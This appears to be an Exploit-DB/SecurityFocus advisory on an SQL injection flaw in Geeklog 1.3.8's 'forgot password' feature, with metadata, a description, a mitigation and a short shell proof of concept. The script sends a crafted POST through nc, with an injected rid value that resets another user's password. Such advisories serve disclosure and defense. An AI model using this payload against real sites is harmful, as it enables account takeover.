SQL Injection Vulnerability in Geeklog 'Forgot Password' Feature

vendor:

Geeklog

by:

SecurityFocus

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Geeklog

Affected Version From: Geeklog 1.3.8

Affected Version To: Geeklog 1.3.8

Patch Exists: YES

Related CWE: N/A

CPE: a:geeklog:geeklog

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2002

SQL Injection Vulnerability in Geeklog ‘Forgot Password’ Feature

An SQL injection vulnerability has been reported in the Geeklog 'forgot password' feature (introduced in Geeklog 1.3.8). Due to insufficient sanitization of user-supplied input, it is possible for remote attacks to influence database queries. This could result in compromise of the Geeklog installation or attacks against the database. An example exploit is provided in the form of a shell script which sends a malicious HTTP request to the vulnerable server.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized before being used in database queries.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8849/info

An SQL injection vulnerability has been reported in the Geeklog "forgot password" feature (introduced in Geeklog 1.3.8). Due to insufficient sanitization of user-supplied input, it is possible for remote attacks to influence database queries. This could result in compromise of the Geeklog installation or attacks against the database. 

------------->8------------->8------------->8------------->8--------------
#!/bin/sh

echo "POST /path/to/gl/users.php HTTP/1.0
Content-length: 50
Content-type: application/x-www-form-urlencoded

mode=setnewpwd&passwd=new&uid=2&rid=3'+or+uid='1&
" | nc localhost 80

------------->8------------->8------------->8------------->8--------------